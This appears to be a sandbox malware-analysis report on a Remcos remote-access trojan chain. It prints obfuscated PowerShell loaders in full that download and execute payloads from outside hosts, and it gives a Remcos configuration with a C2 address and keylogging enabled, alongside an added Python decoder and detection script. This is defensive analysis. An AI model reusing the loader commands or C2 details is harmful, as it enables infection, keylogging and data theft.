INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", ProcessId: 7388, ProcessName: csc.exe
                    Source: File created | Author: frack113, Nasreddine Bencherchali (Nextron Systems) | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7040, TargetFilename: C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS
                    Source: Process started | Author: Nasreddine Bencherchali (Nextron Systems) | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Source: Process started | Author: James Pemberton / @4A616D6573, Endgame, JHasenbusch, oscd.community, Austin Songer @austinsonger | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
                    Source: Process started | Author: frack113, Nasreddine Bencherchali | Data: Command: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentProcessId: 7388, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RES883E.tmp" "c:\Users\user\AppData\Local\Temp\2c1bgmxj\CSC89B293BFADB94B3BBFCBA07F5ADB38CA.TMP", ProcessId: 7404, ProcessName: cvtres.exe
                    Source: Process started | Author: Michael Haag | Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\wscript.exe, NewProcessName: C:\Windows\SysWOW64\wscript.exe, OriginalFileName: C:\Windows\SysWOW64\wscript.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seehavingfacingbestthignstogetmebackwithentiretimegre.vbS" , ProcessId: 7552, ProcessName: wscript.exe
                    Source: File created | Author: frack113 | Data: EventID: 11, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 7040, TargetFilename: C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline
                    Source: Process started | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements) | Data: Command: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))", CommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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
                    Source: Process started | Author: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton | Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+
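The obfuscated PowerShell command lines above contain a small, fully recoverable decode routine: 'ab'+'cd' string splitting, a closing .rePLACe() chain (0Ql to |, ifd to a single quote, opi to $), an Invoke-Expression alias built by indexing the default $VerbosePreference value, a second stage fetched from filemail and cut out between <<BASE64_START>> and <<BASE64_END>> as reversed base64, and a backwards-written URL handed to [dnlib.IO.Home].VAI. The Python below is an added example, not code from the Joe Sandbox report or from the sample. It replays those steps offline and adds a small triage function for the tells the Sigma rules above fired on. The excerpt is shortened from the -command argument above, the "downloaded" text is constructed, and the fake payload is only an MZ-prefixed byte string, not an executable.

```python
"""Added example, not code from the Joe Sandbox report or from the sample:
replays the decode steps visible in the obfuscated PowerShell loader above and
flags the tells the Sigma rules fired on. Runs offline on constructed input."""
import base64
import re
from typing import List, Optional

# Substitution chain copied from the loader's trailing .rePLACe() calls, in order:
# '0Ql' -> '|' ([ChAr]124), 'ifd' -> "'" ([ChAr]39), 'opi' -> '$' ([ChAr]111+112+105)
SUBSTITUTIONS = (("0Ql", "|"), ("ifd", "'"), ("opi", "$"))
START_FLAG, END_FLAG = "<<BASE64_START>>", "<<BASE64_END>>"

# Shortened excerpt of the -command argument from the report: the call that passes
# the reversed download URL and the 'CasPol' host-process name to the dropper.
OBFUSCATED_EXCERPT = (
    "opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');"
    "opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, "
    "ifddesativadoifd, ifdCasPolifd, ifd1ifd))"
)


def resolve_iex_alias(verbose_preference: str = "SilentlyContinue") -> str:
    """& ($verBoSeprEFereNCe.TOstrInG()[1,3]+'X' -JOiN '') indexes the default
    $VerbosePreference value: 'i' + 'e' + 'X' -> 'ieX', i.e. Invoke-Expression."""
    return verbose_preference[1] + verbose_preference[3] + "X"


def deobfuscate(ps: str) -> str:
    """Re-join 'ab'+'cd' string fragments, then apply the substitution chain."""
    text = ps.replace("'+'", "")
    for needle, replacement in SUBSTITUTIONS:
        text = text.replace(needle, replacement)
    return text


def recover_reversed_urls(clear_ps: str) -> List[str]:
    """Quoted arguments ending in ':ptth' / ':sptth' are URLs written backwards."""
    return [arg[::-1] for arg in re.findall(r"'([^']*)'", clear_ps)
            if arg.endswith((":ptth", ":sptth"))]


def extract_stage(downloaded_text: str) -> Optional[bytes]:
    """Mirror the loader: slice between the flags, reverse, base64-decode.
    None when the markers are missing or misordered (its own -ge 0 / -gt test)."""
    start, end = downloaded_text.find(START_FLAG), downloaded_text.find(END_FLAG)
    if start < 0 or end <= start:
        return None
    return base64.b64decode(downloaded_text[start + len(START_FLAG):end][::-1])


# Tells for triage, each lifted from a command line in this report.
_TELLS = {
    "charcode_concat": re.compile(r"\[char\]\s*(?:0x[0-9a-f]+|\d+)", re.I),
    "base64_decode": re.compile(r"frombase64string", re.I),
    "iex_from_preference": re.compile(r"\$verbosepreference\.tostring\(\)\[1,3\]", re.I),
    "reversed_url": re.compile(r"//:s?ptth"),
}
_BYPASS = re.compile(r"-(?:ex|executionpolicy)\s+(bypass)", re.I)


def obfuscation_indicators(cmdline: str) -> List[str]:
    """Return the sorted list of tells present in one process command line."""
    hits = [name for name, rx in _TELLS.items() if rx.search(cmdline)]
    m = _BYPASS.search(cmdline)
    if m and m.group(1) not in ("bypass", "Bypass", "BYPASS"):
        hits.append("case_anomaly")          # e.g. '-Ex bYPAsS'
    return sorted(hits)


# Constructed stand-in for the text fetched from filemail: a fake MZ header (not
# a real executable) wrapped in the flags as reversed base64.
FAKE_PAYLOAD = b"MZ" + b"\x90" * 14 + b"constructed-test-blob"
CONSTRUCTED_DOWNLOAD = ("GIF89a junk " + START_FLAG
                        + base64.b64encode(FAKE_PAYLOAD).decode()[::-1]
                        + END_FLAG + "\ntrailer")

if __name__ == "__main__":
    clear = deobfuscate(OBFUSCATED_EXCERPT)
    print(resolve_iex_alias(), clear, recover_reversed_urls(clear), sep="\n")
    stage = extract_stage(CONSTRUCTED_DOWNLOAD)
    print("stage starts with MZ:", stage is not None and stage[:2] == b"MZ")
    print(obfuscation_indicators('powershell.exe -Ex bYPAsS -NOp -W 1 -C x'))
```

Reversing the first quoted argument yields http://192.3.220.29/45/HDRDDG.txt, the same GET request recorded in the Networking section below, and 'CasPol' names the .NET binary the dropper injects into, matching the CasPol.exe process that later writes C:\ProgramData\remcos\logs.dat. The decoder deliberately performs the join before the substitutions, because the loader's own 'o'+'pi' splits only become the 'opi' sigil after concatenation.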

                    Data Obfuscation

                    Source: Process started | Author: Joe Security | Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'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'+[chaR]34+'))')))", ParentImage: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 7040, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.cmdline", ProcessId: 7388, ProcessName: csc.exe

                    Stealing of Sensitive Information

                    Source: File created | Author: Joe Security | Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe, ProcessId: 8052, TargetFilename: C:\ProgramData\remcos\logs.dat
                    Timestamp                        SID      Severity  Classtype                                       Source IP       Source Port  Destination IP  Destination Port  Protocol
                    2024-11-20T17:18:45.714020+0100  2020425  1         Exploit Kit Activity Detected                   192.3.220.29    80           192.168.2.7     49765             TCP
                    2024-11-20T17:18:45.714020+0100  2020424  1         Exploit Kit Activity Detected                   192.3.220.29    80           192.168.2.7     49765             TCP
                    2024-11-20T17:18:48.453341+0100  2036594  1         Malware Command and Control Activity Detected   192.168.2.7     49773        192.3.101.149   6946              TCP
                    2024-11-20T17:17:59.828215+0100  2057635  1         A Network Trojan was detected                   192.3.220.29    80           192.168.2.7     49765             TCP
                    2024-11-20T17:18:26.927761+0100  2049038  1         A Network Trojan was detected                   142.215.209.78  443          192.168.2.7     49713             TCP
                    2024-11-20T17:18:51.453797+0100  2803304  3         Unknown Traffic                                 192.168.2.7     49779        178.237.33.50   80                TCP
                    2024-11-20T17:17:59.828215+0100  2858295  1         A Network Trojan was detected                   192.3.220.29    80           192.168.2.7     49765             TCP
                    2024-11-20T17:18:45.308579+0100  2858796  1         A Network Trojan was detected                   192.168.2.7     49765        192.3.220.29    80                TCP
                    2024-11-20T17:18:14.218612+0100  2858795  1         A Network Trojan was detected                   192.168.2.7     49699        192.3.220.29    80                TCP


                    AV Detection

                    Source: 00000012.00000002.3689257366.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp | Malware Configuration Extractor: Remcos {"Host:Port:Password": ["banaya.duckdns.org:6946:1"], "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-VCYBO3", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "1", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos"}
                    Source: seethebestthignswhichgivingbestopportunities.hta | ReversingLabs: Detection: 21%
                    Source: Yara match | File source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000002.3693144012.00000000027BE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000012.00000002.3689257366.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR
                    Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
                    Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0043293A CryptAcquireContextA,CryptGenRandom,CryptReleaseContext,18_2_0043293A
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: -----BEGIN PUBLIC KEY-----memstr_ea1f77c1-9

                    Exploits

                    Source: Yara match | File source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara match | File source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
